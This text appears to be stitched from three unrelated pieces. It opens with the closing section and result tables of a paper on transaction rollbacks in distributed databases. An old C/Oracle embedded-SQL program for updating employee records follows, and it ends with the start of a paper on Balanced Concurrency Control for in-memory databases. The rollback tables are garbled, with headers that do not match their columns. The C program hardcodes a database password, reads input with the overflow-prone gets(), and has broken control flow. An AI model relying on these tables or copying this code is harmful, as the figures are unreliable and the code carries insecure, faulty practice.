- Transaction commutativity appears to significantly reduce transaction rollbacks in a partitioned distributed database system. This is only evident from the analysis of model 1. On the other hand, looking at models 2-6, one would conclude that commutativity is not helpful unless it is very high. Thus, the conclusions from model 1 and from models 2-6 appear contradictory. Since models 3-6 assume average transactions that can randomly select any data item to read (or write), the evaluations from these models are likely to predict higher conflicts and hence more rollbacks; the benefits due to commutativity disappear in the average behavior. Model 1, on the other hand, describes a specific system, and hence can compute the rollbacks accurately. It is also able to predict the benefits due to commutativity more accurately.
- The distribution of number of copies seems to affect the evaluations significantly. Thus, accurate modeling of this distribution is vital to evaluation of rollbacks.
In addition to developing several system models and evaluation techniques for these models, this paper makes one significant contribution to the modeling, simulation, and performance analysis community.
If an abstract system model with average information is employed to evaluate the effectiveness of a new technique or a new concept, then we should only expect conservative estimates of the effects. In other words, if the results from the average models are positive, then accept the results. If these are negative, then repeat the analysis with a less abstracted model. Concepts/techniques that are not appropriate for an average system may still be applicable for some specific systems.
Table 1. Effect of Number of Partitions on Rollbacks
<table>
<thead>
<tr>
<th>Model</th>
<th>( p_1 = 4, p_2 = 6, c = 3 )</th>
<th>( p_1 = 4, p_2 = 3, p_3 = 3, c = 3 )</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>Before</td>
<td>After</td>
</tr>
<tr>
<td>Sim.</td>
<td></td>
<td></td>
</tr>
<tr>
<td>1</td>
<td>50200</td>
<td>49965</td>
</tr>
<tr>
<td>2</td>
<td>48315</td>
<td>43297</td>
</tr>
<tr>
<td>3</td>
<td>48315</td>
<td>43297</td>
</tr>
<tr>
<td>4</td>
<td>48618</td>
<td>43297</td>
</tr>
<tr>
<td>5</td>
<td>47276</td>
<td>43297</td>
</tr>
<tr>
<td>6</td>
<td>46593</td>
<td>43297</td>
</tr>
</tbody>
</table>
Table 2. Effect of Number of Copies on Rollbacks
<table>
<thead>
<tr>
<th>Model</th>
<th>( p_1 = 4, p_2 = 6, c = 2 )</th>
<th>( p_1 = 4, p_2 = 6, c = 8 )</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>Before</td>
<td>After</td>
</tr>
<tr>
<td>Sim.</td>
<td></td>
<td></td>
</tr>
<tr>
<td>1</td>
<td>34600</td>
<td>33854</td>
</tr>
<tr>
<td>2</td>
<td>31069</td>
<td>23952</td>
</tr>
<tr>
<td>3</td>
<td>31069</td>
<td>23952</td>
</tr>
<tr>
<td>4</td>
<td>31595</td>
<td>24134</td>
</tr>
<tr>
<td>5</td>
<td>23203</td>
<td>19309</td>
</tr>
<tr>
<td>6</td>
<td>27138</td>
<td>22024</td>
</tr>
</tbody>
</table>
Table 3. Effect of Number of Nodes on Rollbacks
<table>
<thead>
<tr>
<th>Model</th>
<th>( p_1 = 10, p_2 = 10, c = 5 )</th>
<th>( p_1 = 10, p_2 = 10, c = 12 )</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>Before</td>
<td>After</td>
</tr>
<tr>
<td>Sim.</td>
<td></td>
<td></td>
</tr>
<tr>
<td>1</td>
<td>61250</td>
<td>50110</td>
</tr>
<tr>
<td>2</td>
<td>61250</td>
<td>50110</td>
</tr>
<tr>
<td>3</td>
<td>61024</td>
<td>30751</td>
</tr>
<tr>
<td>4</td>
<td>61024</td>
<td>30751</td>
</tr>
<tr>
<td>5</td>
<td>61024</td>
<td>30751</td>
</tr>
<tr>
<td>6</td>
<td>60876</td>
<td>30751</td>
</tr>
</tbody>
</table>
ACKNOWLEDGEMENT
This research was sponsored in part by the NASA Langley Research Center under contract NAG-1-1154.
Effects of Distributed Database Modeling on Evaluation of Transaction Rollbacks
Table 4. Effect of \( m \) on Rollbacks (Models 5 and 6: \( p_1 = 4, p_2 = 6, c = 3 \))
<table>
<thead>
<tr>
<th>Model 5</th>
<th>Model 6</th>
</tr>
</thead>
<tbody>
<tr>
<td>( m )</td>
<td>( R_1 )</td>
</tr>
<tr>
<td>---------</td>
<td>---------</td>
</tr>
<tr>
<td>Before Merge</td>
<td>After Merge</td>
</tr>
<tr>
<td>0.00</td>
<td>47276</td>
</tr>
<tr>
<td>0.50</td>
<td>47276</td>
</tr>
<tr>
<td>0.80</td>
<td>47276</td>
</tr>
<tr>
<td>0.90</td>
<td>47276</td>
</tr>
<tr>
<td>0.95</td>
<td>47276</td>
</tr>
<tr>
<td>1.00</td>
<td>46726</td>
</tr>
</tbody>
</table>
Table 5. Effect of \( m \) on Rollbacks (Model 2: \( p_1 = 4, p_2 = 6 \))
<table>
<thead>
<tr>
<th>( c = 3 )</th>
<th>( c = 8 )</th>
</tr>
</thead>
<tbody>
<tr>
<td>( m )</td>
<td>( R_1 )</td>
</tr>
<tr>
<td>---------</td>
<td>---------</td>
</tr>
<tr>
<td>Before Merge</td>
<td>After Merge</td>
</tr>
<tr>
<td>0.00</td>
<td>48315</td>
</tr>
<tr>
<td>0.27</td>
<td>48315</td>
</tr>
<tr>
<td>0.40</td>
<td>48315</td>
</tr>
<tr>
<td>0.77</td>
<td>48315</td>
</tr>
<tr>
<td>0.95</td>
<td>48315</td>
</tr>
<tr>
<td>1.00</td>
<td>48315</td>
</tr>
</tbody>
</table>
Table 6. Effect of \( m \) on Rollbacks (Model 1: \( p_1 = 4, p_2 = 6 \))
<table>
<thead>
<tr>
<th>( c = 3 )</th>
<th>( c = 8 )</th>
</tr>
</thead>
<tbody>
<tr>
<td>( m )</td>
<td>( R_1 )</td>
</tr>
<tr>
<td>---------</td>
<td>---------</td>
</tr>
<tr>
<td>Before Merge</td>
<td>After Merge</td>
</tr>
<tr>
<td>0.00</td>
<td>50200</td>
</tr>
<tr>
<td>0.27</td>
<td>50200</td>
</tr>
<tr>
<td>0.40</td>
<td>50200</td>
</tr>
<tr>
<td>0.77</td>
<td>50200</td>
</tr>
<tr>
<td>1.00</td>
<td>50200</td>
</tr>
</tbody>
</table>
Table 7. Effect of Variations in # of Copies on Rollbacks
(Model 1: \( p_1 = 4, p_2 = 6 \); w/c: with commutativity, \( m = 0.27 \); wo/c: without commutativity, \( m = 0.0 \))
<table>
<thead>
<tr>
<th>Copy Distribution</th>
<th>Before Merge</th>
<th>After Merge</th>
</tr>
</thead>
<tbody>
<tr>
<td>( d_1 = 500 )</td>
<td>w/c 50200 1000 199 49001</td>
<td>wo/c 50200 4000 1199 45001</td>
</tr>
<tr>
<td>( d_2 = d_4 = 100, d_3 = 300 )</td>
<td>w/c 48300 1000 997 46303</td>
<td>wo/c 48300 4200 1793 42307</td>
</tr>
<tr>
<td>( d_2 = d_4 = 167, d_3 = 166 )</td>
<td>w/c 41400 200 0 41200</td>
<td>wo/c 41400 2000 597 38803</td>
</tr>
<tr>
<td>( d_1 = d_3 = d_4 = d_5 = 100 )</td>
<td>w/c 48400 200 0 48200</td>
<td>wo/c 48400 2000 797 38003</td>
</tr>
<tr>
<td>( d_1 = d_5 = 250 )</td>
<td>w/c 28700 0 0 28700</td>
<td>wo/c 28700 1200 199 27301</td>
</tr>
</tbody>
</table>
This program creates a menu and facilitates updates, inserts, and deletes of records in a database. EMPP is an employee database table, and the program assumes it has already been created with the following fields:
EMPNO (employee number) of type numeric
ENAME (employee name) of type character
SAL (salary) of type numeric with provision for 2 places after decimal
DEPTNO (department number) of type numeric
JOB (job name) of type character
#include <stdio.h>
#include <ctype.h>
#include <string.h> /* for strcpy(), strlen() */
#include <stdlib.h> /* for atoi(), exit() */
EXEC SQL BEGIN DECLARE SECTION;
VARCHAR uid[80]; /* variable for user id */
VARCHAR pwd[20]; /* variable for password */
int empno; /* host variable for primary key - employee number */
VARCHAR ename[15]; /* host variable for employee name */
int deptno; /* department number */
VARCHAR job[15]; /* host variable for job */
int sal; /* host variable for salary */
int l = 0; /* host variable to hold the length of the string - a value returned by the asks() function. */
int count; /* a variable to obtain number of records in the database with the same primary key value */
int reply = 0; /* variable to record whether a field should be given a new value */
int choice = 0; /* variable defined to obtain value for the menu */
int code; /* variable to print to the ascii file to indicate whether the record was updated (value=1), inserted (value=2) and deleted (value=3) */
EXEC SQL END DECLARE SECTION;
EXEC SQL INCLUDE SQLCA;
FILE *fp;
main()
{
/* open ascii file in append mode */
fp = fopen("outfile", "a"); /* give the login and password to logon to the database */
strcpy(uid.arr,"rsp");
uid.len = strlen(uid.arr);
strcpy(pwd.arr,"prs");
pwd.len = strlen(pwd.arr);
/* exit in case of an unauthorized accessor to the database */
EXEC SQL WHENEVER SQLERROR GOTO errexit;
EXEC SQL CONNECT :uid IDENTIFIED BY :pwd;
for (;;) {
/* infinite loop begins */
/* menu for selecting update, insert, and delete options */
printf("\n \n 1. Update a record \n");
printf("\n \n 2. Insert a record \n");
printf("\n \n 3. Delete a record \n");
printf("\n \n Select an option 1/2/3 ? \n");
choice = getche();
if (choice == '1') goto update;
else if (choice == '2') goto insert;
else if (choice == '3') goto delete;
else { printf("invalid selection");
exit(1); }
update: { /* label for the update option */
/* To ensure that the employee with the given employee number
exists, before update could be made. */
code = 1;
printf(" \n count is %d \n", count);
askn("Enter employee number to be updated: ", &empno);
/* using the COUNT supported by oracle, the number of records
having the desired employee number is assigned the variable count
*/
EXEC SQL SELECT COUNT(EMPNO) INTO :count
FROM EMPP
WHERE EMPNO = :empno;
printf("count is %d \n", count);
if (count == 0)
{ printf("Employee with employee number %d does not exist \n", empno);
exit(1); }
/* retrieve the information from the database whose employee-number
has been requested for, and place the contents of the fields into
C variables for update purposes. */
EXEC SQL SELECT ENAME, SAL, DEPTNO, JOB
INTO :ename, :sal, :deptno, :job
FROM EMPP
WHERE EMPNO = :empno;
/* displays the already existing value for employee name */
/* assign the new employee name if it should be updated */
printf("ename is %s \n", ename.arr);
printf("Do you want to update ENAME:(y/n)?");
reply = getche();
if (reply == 'n'){
printf("\n ename is %s \n", ename.arr);
}
if (reply == 'y') {
ename.len = asks("\n enter employee name : ", ename.arr);
printf("new ename is %s \n", ename.arr);
}
/* displays the already existing value for job name */
/* assign the new job if it should be updated */
printf("do you want to update job-name:(y/n)?");
reply = getche();
if (reply == 'n'){
printf("\n job-name is %s \n", job.arr);
}
if (reply == 'y') {
job.len = asks("\n enter employee’s job :", job.arr);
printf("new job-name is %s \n", job.arr);
}
/* displays the already existing value for salary */
/* assign new salary if it should be updated */
printf("Do you want to update salary:(y/n) ");
reply = getche();
if (reply == 'n'){
printf("\n salary is %d \n", sal);
}
if (reply == 'y') {
askn("\n enter employee’s salary: ", &sal);
printf("new salary is %d \n", sal);
}
/* displays the already existing value for department number */
/* assign the new department number if it should be updated */
printf("Do you want to update deptno :(y/n) ");
reply = getche();
if (reply == 'n'){
printf("\n deptno is %d \n", deptno);
}
if (reply == 'y'){
askn("\n Enter employee dept : ", &deptno);
printf("new deptno is %d \n", deptno);} /* update the database with the new values */
EXEC SQL UPDATE EMPP
SET ENAME = :ename, SAL = :sal, DEPTNO = :deptno, JOB = :job
WHERE EMPNO = :empno;
printf("\n %s with employee number %d has been updated\n", ename.arr, empno);
fprintf(fp,"%10d %1d %15s", empno, code, ename.arr);
fprintf(fp,"%6d %3d %4s\n", sal, deptno, job.arr);
printf("%10d %15s %6d", empno, ename.arr, sal);
printf("%3d %4s\n", deptno, job.arr);
continue; /* back to the menu after an update */
}
insert: /* label for insertion of record based on the employee number */
{
code = 2;
/* To prevent insertion of a record whose primary key is the same as the primary key of an already existing record */
askn("\n Enter employee number to be inserted:", &empno);
EXEC SQL SELECT COUNT(EMPNO) INTO :count
FROM EMPP
WHERE EMPNO = :empno;
printf("count is %d \n", count);
if (count > 0){
printf("Employee with %d employee number already exists \n", empno);
exit(1);}
else { /* obtain values for various fields to be inserted */
ename.len = asks("Enter employee name : ", ename.arr);
job.len = asks("Enter employee job :", job.arr);
askn("Enter employee salary :", &sal);
askn("Enter employee dept number :", &deptno);
/* insert the values obtained into the database */
EXEC SQL INSERT INTO EMPP(EMPNO, ENAME, JOB, SAL, DEPTNO)
VALUES (:empno, :ename, :job, :sal, :deptno);
/* append the insert into the ascii file */
fprintf(fp,"%10d %1d %15s ", empno, code, ename.arr);
fprintf(fp,"%6d %3d %4s \n", sal, deptno, job.arr);
printf("%10d %15s %6d", empno, ename.arr, sal);
printf("%3d %4s", deptno, job.arr); }
continue; /* back to the menu after an insert */
}
delete: /* label for deletion of records based on employee number */
{
int code = 3;
/* obtain the employee number of the employee to be deleted */
askn("Enter employee number to be deleted :", &empno);
EXEC SQL SELECT COUNT(EMPNO) INTO :count
FROM EMPP
WHERE EMPNO = :empno;
if (count > 0){ /* delete record if it exists */
EXEC SQL DELETE FROM EMPP WHERE EMPNO = :empno;
printf("Employee number %d deleted \n", empno);
fprintf(fp, "%10d %1d\n", empno, code);
}
else {
printf("Employee with number %d does not exist \n", empno);
exit(1);}
}
EXEC SQL COMMIT WORK RELEASE; /* make the changes permanent */
printf ("\n End of the C/ORACLE example program.\n");
fclose(fp);
return;
errexit: /* reached via WHENEVER SQLERROR on a database error */
EXEC SQL WHENEVER SQLERROR CONTINUE;
EXEC SQL ROLLBACK WORK RELEASE; /* in case of inconsistency */
errrpt();
}
} /* infinite loop ends */
/* function takes the text to be printed and accepts a string variable from standard input and converts it into numeric - hence is used to obtain values for numeric fields */
int askn(text, variable)
char text[];
int *variable;
{
char s[20];
printf(text);
fflush(stdout);
if (gets(s) == (char *)0)
return(EOF);
*variable = atoi(s);
return(1);
}
/* function takes the text to be printed and prints it, accepts string values for character variables and is thus used to obtain values for fields of type character. It returns the length of the string value */
int asks(text,variable)
char text[],variable[];
{
printf(text);
fflush(stdout);
return ( gets(variable) == (char *)0 ? EOF : strlen(variable));
}
errrpt()
{
printf("%.70s (%d)\n", sqlca.sqlerrm.sqlerrmc, -sqlca.sqlcode);
return(0);
}
BCC: Reducing False Aborts in Optimistic Concurrency Control with Low Cost for In-Memory Databases
Yuan Yuan¹, Kaibo Wang¹, Rubao Lee¹, Xiaoning Ding², Jing Xing³, Spyros Blanas¹, Xiaodong Zhang¹
¹The Ohio State University
²New Jersey Institute of Technology
³Institute of Computing Technology, Chinese Academy of Sciences
ABSTRACT
The Optimistic Concurrency Control (OCC) method has been commonly used for in-memory databases to ensure transaction serializability — a transaction will be aborted if its read set has been changed during execution. This simple criterion to abort transactions causes a large proportion of false positives, leading to excessive transaction aborts. Transactions aborted false-positively (i.e., false aborts) waste system resources and can significantly degrade system throughput (as much as 3.68x based on our experiments) when data contention is intensive.
Modern in-memory databases run on systems with increasingly parallel hardware and handle workloads with growing concurrency. They must efficiently deal with data contention in the presence of greater concurrency by minimizing false aborts. This paper presents a new concurrency control method named Balanced Concurrency Control (BCC) which aborts transactions more carefully than OCC does. BCC detects data dependency patterns which can more reliably indicate unserializable transactions than the criterion used in OCC. The paper studies the design options and implementation techniques that can effectively detect data contention by identifying dependency patterns with low overhead. To test the performance of BCC, we have implemented it in Silo and compared its performance against that of the vanilla Silo system with OCC and two-phase locking (2PL). Our extensive experiments with TPC-W-like, TPC-C-like and YCSB workloads demonstrate that when data contention is intensive, BCC can increase throughput by more than 3x versus OCC and more than 2x versus 2PL; meanwhile, BCC has comparable performance with OCC for workloads with low data contention.
1. INTRODUCTION
The rapid increase of memory capacity has made it possible to store an entire OLTP database in the memory of a single server. With memory-resident data, the performance bottleneck of databases has shifted from disk I/O to software-related overhead such as locking and buffer management [15, 9]. This has triggered a re-design of database systems for in-memory data. Among the concurrency control methods that have a great impact on database performance, Optimistic Concurrency Control (OCC) [17] has been favored by recent in-memory databases for its high performance and scalability [18, 8, 30, 31, 33, 21].
With the OCC method, a database executes each transaction in three phases: read, validation, and write. In the read phase, the database keeps track of what the transaction reads into a read set and buffers the transaction’s writes into a write set in the transaction’s private storage. In the validation phase, the database validates the transaction’s read set. If the transaction’s read set has been changed, the transaction must be aborted. Otherwise, the transaction proceeds to the write phase, in which the database installs the transaction’s writes to the database storage. The validation and write phases must be executed in the critical section.
OCC is optimistic in the read phase. It assumes that all the transactions can proceed concurrently, and transactions in the read phase cannot block the execution of other transactions. Being optimistic maximizes the concurrency level, leading to high scalability and throughput. However, OCC becomes pessimistic in the validation phase: it excessively aborts transactions to ensure serializability. Some aborted transactions may not affect serializability at all, because a change in a transaction's read set is not a sufficient condition for the schedule to be unserializable. Based on serializability theory, only transactions that form a cycle in their dependency graph cannot be serialized and must be aborted [13]. This paper refers to the transactions aborted false-positively as false aborts, to differentiate them from the transactions that actually violate the serializability requirement.
A false abort happens when a transaction is aborted by OCC (i.e., its read set changed) but it meets the serializability requirement (i.e., it is not in a cycle in the dependency graph). The difference between these two criteria can be illustrated with the following two transactions: \(T_1: r(A) w(B)\) and \(T_2: r(A) w(A)\). Figure 1 shows a schedule of \(T_1\) and \(T_2\). According to OCC’s validation criterion, \(T_2\) can successfully commit since its read set is not changed, while \(T_1\) must be aborted since its read set has been changed by \(T_2\). However, based on the serializability theory, since there is no cycle in the serialization graph (i.e., \(T_1 \xrightarrow{rw} T_2\) only), both \(T_1\) and \(T_2\) should be committed. If both of them were allowed to commit, the database state would be the same as that after \(T_1\) and \(T_2\) execute serially. Since \(T_1\) is aborted by OCC though it should be allowed to commit based on the serializability requirement, the abort is a false abort.
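To make the contrast concrete, the following sketch (our own illustration, not code from the paper) replays the schedule of Figure 1 and applies both criteria: OCC’s read-set check aborts \(T_1\), while a cycle check on the dependency graph finds the schedule serializable.

```python
# Replay of Figure 1's schedule: T1: r(A) w(B), T2: r(A) w(A); T2 commits first.
# All names here are ours, for illustration only.

def occ_read_set_valid(read_versions, current_versions):
    """OCC's criterion: commit only if no tuple read has changed."""
    return all(current_versions[t] == v for t, v in read_versions.items())

def has_cycle(edges):
    """Serializability criterion: the dependency graph must be acyclic."""
    graph = {}
    for src, dst in edges:
        graph.setdefault(src, set()).add(dst)
    visited, on_stack = set(), set()

    def dfs(node):
        visited.add(node)
        on_stack.add(node)
        for nxt in graph.get(node, ()):
            if nxt in on_stack or (nxt not in visited and dfs(nxt)):
                return True
        on_stack.discard(node)
        return False

    return any(n not in visited and dfs(n) for n in list(graph))

# Both transactions read version 0 of A; then T2 commits A's version 1.
versions = {"A": 1, "B": 0}                 # state when T1 validates
versions_at_t2_commit = {"A": 0, "B": 0}    # A unchanged when T2 validated
t1_reads, t2_reads = {"A": 0}, {"A": 0}

occ_aborts_t1 = not occ_read_set_valid(t1_reads, versions)            # True
occ_commits_t2 = occ_read_set_valid(t2_reads, versions_at_t2_commit)  # True

# Dependency graph has only the edge T1 -rw-> T2: no cycle, so serializable.
serializable = not has_cycle([("T1", "T2")])                          # True
```

Aborting \(T_1\) despite `serializable` being true is exactly the false abort described above.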
When data contention is low, aborts, as well as false aborts, are rare, so being pessimistic in transaction validation will not cause serious performance issues. For example, in-memory OCC databases can achieve a throughput of over 500,000 transactions per second under low-contention workloads [30, 31]. However, when data contention becomes intensive, an increasing number of transactions may be aborted false-positively. Data contention becomes intensive with the increase of CPU core counts. Data sets with skewed characteristics, e.g., those in OLTP workloads [28], also intensify contention. Based on our experiments, false aborts can reduce system throughput by 3.68x under a TPC-W-like workload. It is important for databases to provide good performance in both low-contention and high-contention scenarios.
To completely remove false aborts, database systems must abort transactions based on cycle detection in serialization graphs. The idea of detecting partial dependency cycles to guarantee serializability was first proposed by Cahill et al. [5] for disk-based snapshot isolation databases. However, due to its prohibitive cost, the technique is not directly applicable to in-memory databases, where transactions are usually very short. Detecting cycles requires the database to operate on shared data structures such as wait-for graphs, which significantly impacts the system’s scalability, especially for low-contention workloads [6].
The dilemma lies between improving the validation with an accurate criterion to abort transactions and maintaining a low overhead for transaction execution. In this paper, we resolve the dilemma by proposing the Balanced Concurrency Control (BCC) method, which seeks a sweet spot between being careful and being fast, balancing the accuracy and the overhead of transaction validation. Specifically, in addition to detecting the anti-dependency as OCC does, BCC detects one additional data dependency in a confined search space, which, together with the anti-dependency, forms an essential dependency pattern. This pattern indicates the existence of a cycle in the transaction dependency graph (i.e., an unserializable transaction schedule) more reliably than OCC’s criterion. We will show that by examining one additional dependency BCC can effectively reduce false aborts. At the same time, since BCC limits the search space for the additional dependency, the overhead of dependency detection can be effectively controlled through careful system design and implementation.
The paper makes the following contributions. First, it proposes a new concurrency control method for reducing false aborts while retaining OCC’s merits for low-contention workloads. Second, the paper proposes an optimized BCC method leveraging state-of-the-art in-memory database features. Third, the paper studies implementation techniques for minimizing run-time overhead. Fourth, to demonstrate BCC’s effectiveness, we implement it in Silo [30], which is a representative OCC-based in-memory database. Our implementation makes a case for how to adopt BCC in an OCC-based concurrency control kernel. Finally, we comprehensively evaluate BCC’s performance on a 32-core machine. Our results demonstrate that BCC has a decisive performance advantage over OCC when contention becomes intensive. This advantage is due to a reduction in transaction aborts and an increase in transaction throughput and workload scalability. Meanwhile, BCC has performance comparable with OCC for low-contention workloads.
2. BALANCED CONCURRENCY CONTROL
BCC is an optimistic concurrency control method by nature. The key difference between BCC and other optimistic methods lies in the validation phase: how to determine whether a transaction schedule is unserializable. In this section we first review the concepts of transaction history and data dependency in databases. Then we present BCC’s transaction model and the essential dependency patterns that BCC utilizes in its validation to guarantee serializability. After that we explain how BCC detects the essential patterns and discuss BCC’s overhead.
2.1 Background
Transaction History. A transaction history is an execution of database transactions that specifies a partial order of transactional operations on database tuples. Similar to previous work [4, 3], we use \( r_i[x_j] \) to represent that transaction \( T_i \) reads version \( x_j \) of tuple \( x \); \( w_i[x_j] \) to represent that \( T_i \) writes version \( x_j \); \( c_i \) to represent that \( T_i \) is committed; and \( a_i \) to represent that \( T_i \) is aborted. Given a tuple \( x \)’s two versions, \( x_i \) is generated before \( x_j \) if \( i < j \).
Data Dependency. Data dependencies happen between transactions when they operate on the same tuple and at least one of the operations is write. The types of dependencies are determined by the operation type (read or write) and the order in which the transactions commit.
There are three types of data dependencies.
- Write-Read (wr) dependency: if transaction \( T_i \) reads a tuple that has been committed earlier by another transaction \( T_j \), \( T_i \) is \( wr \) dependent on \( T_j \), denoted as \( T_j \xrightarrow{wr} T_i \).
- Write-Write (ww) dependency: if transaction \( T_i \) commits a tuple that has been committed earlier by another transaction \( T_j \), \( T_i \) is \( ww \) dependent on \( T_j \), denoted as \( T_j \xrightarrow{ww} T_i \).
- Read-Write (rw) dependency: if transaction \( T_i \) commits a tuple that has been read earlier by another transaction \( T_j \), \( T_i \) is \( rw \) dependent on \( T_j \) (or \( T_j \) is anti-dependent on \( T_i \)), denoted as \( T_j \xrightarrow{rw} T_i \). Here, \( T_j \) has already started when \( T_i \) commits.
We use \( T_i \rightarrow T_j \) to denote that \( T_j \) depends on \( T_i \) through any of the above dependency types.
2.2 Essential Dependency Patterns
BCC assumes the following transaction model.
- Each transaction is executed in read, validation and write phases.
- Each transaction can only read committed tuples.
- The validation and write phases must be executed in the critical section.
Note that BCC and OCC [17] have the same transaction model. In the validation phase, BCC exploits essential dependency patterns (or essential patterns for brevity) among transactions to determine unserializable transaction schedules. Each essential pattern specifies that certain data dependencies exist between transactions. We will demonstrate that the existence of an essential pattern is a necessary condition that a transaction schedule is unserializable in databases that satisfy BCC’s transaction model. In this case, BCC ensures serializability by avoiding the essential patterns.
The essential dependency patterns that BCC detects and prevents are described as follows.
Theorem 1 In databases that satisfy BCC’s transaction model, when an unserializable transaction schedule is created, the schedule must contain the following transactions $T_1$, $T_2$ and $T_3$ such that (1) $T_3$ is the earliest committed transaction in the schedule; (2) $T_2 \xrightarrow{rw} T_3$; and (3) $T_1 \rightarrow T_2$ and $T_1$ commits after $T_2$ starts. The data dependency patterns formed by $T_1$, $T_2$ and $T_3$ are called the essential patterns.
**Proof.** When an unserializable transaction schedule is created, a cycle must exist in the transaction dependency graph. Let $T_3$ be the first transaction committed in the schedule. To form the cycle, $T_3$ must be dependent on another transaction (i.e., it must be pointed to by an arrow in the dependency cycle). Since a transaction can only read committed tuples, this dependency cannot be a $ww$ dependency or a $wr$ dependency (otherwise there would exist another transaction in the schedule that committed earlier than $T_3$ committed, which contradicts the fact that $T_3$ is the first committed transaction in the schedule). Thus, this dependency must be a $rw$ dependency. Let the transaction that $T_3$ is $rw$ dependent on be $T_2$ (i.e., $T_2 \xrightarrow{rw} T_3$). $T_3$ must commit after $T_2$ starts. To form the cycle, $T_2$ must also be dependent on a transaction in the cycle. Let that transaction be $T_1$ (i.e., $T_1 \rightarrow T_2$). $T_1$ must commit after $T_2$ starts, because $T_3$ commits after $T_2$ starts and $T_1$ commits later than $T_3$ commits.
**Theorem 2** Transactions aborted by OCC may not be aborted by BCC, while transactions aborted by BCC will always be aborted by OCC.
**Proof.** The dependency $T_2 \xrightarrow{\text{rw}} T_3$ in the essential patterns is the anti-dependency detected by OCC, and the essential patterns examine additional dependencies to decide whether a transaction should be aborted.
BCC utilizes the essential patterns to ensure serializability for three reasons. First, based on Theorem 1, validation based on detecting essential patterns only commits serializable transactions. Second, based on Theorem 2, validation based on detecting essential patterns reduces aborts compared to OCC. Third, the overhead of detecting the essential patterns can be effectively controlled by limiting the search space: BCC excludes all transactions $T_1$ that commit before $T_2$ starts.
### 2.3 Detection of Essential Patterns
A BCC database aborts a transaction if committing the transaction would create an essential pattern. To detect the essential patterns, the database needs to decide: (1) what data dependencies should be examined in each transaction’s validation phase; and (2) what data dependency information should be kept for validating other transactions.
Figure 2 shows all possible essential patterns when an unserializable transaction schedule is created. The essential patterns can be divided into two categories based on when they would be created.
The first category contains three essential patterns that would be created at the time a transaction $T_2$ commits, which are shown in Figures 2(a) to 2(c). To detect these patterns, the database needs to validate whether any transaction could be $T_2$ in the essential pattern by checking: (1) if the transaction $T_2$ is anti-dependent on a committed transaction $T_3$, or $T_2 \xrightarrow{rw} T_3$; and (2) if the transaction $T_2$ is $ww$-, $wr$- or $rw$-dependent on any concurrent transaction $T_1$, or $T_1 \xrightarrow{ww} T_2$, $T_1 \xrightarrow{wr} T_2$ or $T_1 \xrightarrow{rw} T_2$.
The second category only manifests with snapshot transactions that always operate on a consistent snapshot of the database. The essential pattern that would be created at the time snapshot transaction $T_1$ commits is shown in Figure 2(d). In this case, when $T_1$’s snapshot time is before $T_2$’s commit time and $T_1$’s read operation happens after $T_2$ commits, the dependency $T_1 \xrightarrow{\text{rw}} T_2$ can only be detected when $T_1$ commits. To detect this pattern, the database needs to validate if any transaction could be $T_1$ in the essential pattern by checking if the transaction $T_1$ is a snapshot transaction and $T_1$ is anti-dependent on a committed transaction $T_2$ ($T_1 \xrightarrow{\text{rw}} T_2$), which is in turn anti-dependent on another committed transaction $T_3$ ($T_2 \xrightarrow{\text{rw}} T_3$). This requires the database to retain all anti-dependency information.
Algorithm 1 summarizes how BCC validates a transaction $T$ to detect and prevent the essential patterns.
**Algorithm 1** BCC’s validation and write phases for a committing transaction $T$
1: if $T$ is anti-dependent on any committed transaction then
2: record $T$’s anti-dependency information;
3: if $T$ is $\text{wr}$-, $\text{ww}$-, or $\text{rw}$-dependent on any concurrent transaction then
4: abort $T$;
5: end if
6: if $T$ is a snapshot transaction and there exists a transaction $T'$ such that $T$ is anti-dependent on $T'$ and $T'$ is anti-dependent on a committed transaction then
7: abort $T$;
8: end if
9: end if
10: install $T$’s writes and commit $T$;
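Setting aside the snapshot-transaction case (lines 6–9), the core decision of Algorithm 1 can be sketched as a predicate. This is our own simplification: the real validation also records anti-dependency information for validating later transactions.

```python
def bcc_abort(anti_dep_on_committed, dep_on_concurrent):
    """Abort T only when T could be the essential pattern's T2: it is
    anti-dependent on a committed transaction (T2 -rw-> T3) AND is
    ww/wr/rw-dependent on a concurrent transaction (T1 -> T2)."""
    return anti_dep_on_committed and dep_on_concurrent

def occ_abort(anti_dep_on_committed):
    """OCC aborts on the anti-dependency alone (read set changed)."""
    return anti_dep_on_committed
```

The schedule of Figure 1 falls in the case `anti_dep_on_committed=True, dep_on_concurrent=False`: OCC aborts \(T_1\) while BCC commits it.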
BCC examines two data dependencies to detect the essential patterns. Theoretically, examining more dependencies can further reduce false aborts. However, the overheads would increase significantly. If more dependencies were detected, the dependencies could happen not only between concurrent transactions, but also between an active transaction and previously committed transactions that were concurrent with other active transactions. This makes the cost of checking dependencies increase exponentially. Even disk-based
databases (e.g. PostgreSQL) avoid considering more than two dependencies [26] because of the high overhead [24].
3. AN OPTIMIZED BCC METHOD
In-memory databases can execute transactions as snapshot transactions. In some state-of-the-art in-memory databases, such as [30, 31], read-only transactions are executed as snapshot transactions while write transactions are not. There are two reasons for this design. First, read-only transactions may be continuously aborted when running with other write transactions. Running them as snapshot transactions guarantees that they will never be aborted, although they may read stale data. Second, write transactions dominate the transactions executed by the database. Running them as snapshot transactions could introduce expensive operations, such as acquiring latches and locks for read operations in some concurrency control kernels, which would degrade the database’s performance and scalability even though the database has strived to avoid all centralized hotspots and scalability bottlenecks.
The BCC method requires the database to maintain a history of anti-dependency information to detect the essential pattern shown in Figure 2(d). If naively implemented, this can add a centralized hot spot to the in-memory database kernel and hurt BCC’s scalability. The overhead is caused by the fact that when a transaction $T_1$ is a snapshot transaction, the dependency $T_1 \xrightarrow{rw} T_2$ may not exist yet when $T_2$ commits. Therefore, to avoid BCC’s overhead of maintaining historical dependency information, the database must guarantee that read-only snapshot transactions can never appear in any essential pattern.
Existing in-memory OCC databases avoid validating the snapshot transaction by taking an early snapshot time. However, this does not work in BCC. The reason is that the dependency cycle that is shown in Figure 2(d) can be created, with transaction T1 being the snapshot transaction, no matter when the snapshot is taken. Based on BCC’s validation criteria, both transactions T2 and T3 would be allowed to commit because no essential patterns are detected. To guarantee serializability, the database has to validate the snapshot transaction T1, detect the essential pattern, and abort T1.
We solve the problem by adding a light-weight synchronization point for snapshot transactions. The idea is that when a new read-only snapshot transaction begins, the database doesn’t immediately start executing the snapshot transaction. Instead, it waits until all the active transactions are finished. During this period, no new transactions will be executed. After all active transactions have finished, the database takes a snapshot for the snapshot transaction and resumes executing transactions as normal.
